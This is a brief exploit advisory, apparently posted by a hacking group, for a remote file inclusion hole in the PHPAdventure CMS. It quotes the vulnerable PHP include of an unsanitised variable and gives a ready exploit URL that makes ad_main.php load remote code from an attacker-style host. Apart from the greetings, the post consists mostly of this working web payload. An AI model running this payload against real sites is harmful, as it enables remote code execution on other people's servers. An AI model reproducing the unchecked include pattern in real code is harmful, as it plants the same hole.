D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
contac:[email protected]
nota: all the versions of PHPAdventure is affectedβ¦
line of the code:
<?php
$_stage = 1;
include($_mygamefile);
?>
exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
greetz:Sponge Bob,Bob esponja XDDDDβ¦